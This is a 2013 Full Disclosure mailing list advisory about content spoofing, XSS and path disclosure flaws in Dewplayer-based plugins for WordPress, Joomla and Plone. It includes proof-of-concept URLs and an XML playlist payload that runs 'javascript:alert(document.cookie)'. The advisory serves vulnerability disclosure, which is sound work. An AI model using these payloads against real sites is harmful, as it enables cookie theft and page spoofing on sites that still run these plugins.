Full Disclosure mailing list archives
Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer
From: "MustLive" <mustlive () websecurity com ua>
Date: Thu, 26 Dec 2013 19:11:09 +0200
Hello list!These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer. Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is media player, which is used at thousands web sites and in multiple web applications. There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others).
This flash media player is used in the next plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer.
------------------------- Affected products: -------------------------Vulnerable are the next web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions.
Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions.
------------------------- Affected vendors: ------------------------- Plugins for different CMS with Dewplayer: http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/ http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779 http://plone.org/products/collective.dewplayer ---------- Details: ----------These are examples of some vulnerabilities in Dewplayer, examples of all СS and XSS vulnerabilities see in above-mentioned advisory.
Dewplayer for WordPress:Plugin contains the next flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes.
Content Spoofing (Content Injection) (WASC-12): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3 Full path disclosure (WASC-13): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php JosDewplayer and mosdewplayer:Plugin JosDewplayer is based on mosdewplayer, so holes must be similar in them.
Plugin contains the next flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes.
http://site/plugins/content/josdewplayer/dewplayer.swf collective.dewplayer:Plugin contains the next flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes.
The path at web site can be different: http://site/files/++resource++collective.dewplayer/dewplayer.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/dewplayer.swf?mp3=1.mp3 XSS (WASC-08): http://site/path/dewplayer-vinyl.swf?xml=xss.xml xss.xml <playlist version="1"> <trackList> <track> <location>javascript:alert(document.cookie)</location> <title>XSS</title> </track> </trackList> </playlist> ------------ Timeline:------------
2013.10.25 - announced at my site. 2013.10.26 - informed developers. 2013.12.19 - disclosed at my site about Dewplayer.2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/).
Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer MustLive (Dec 26)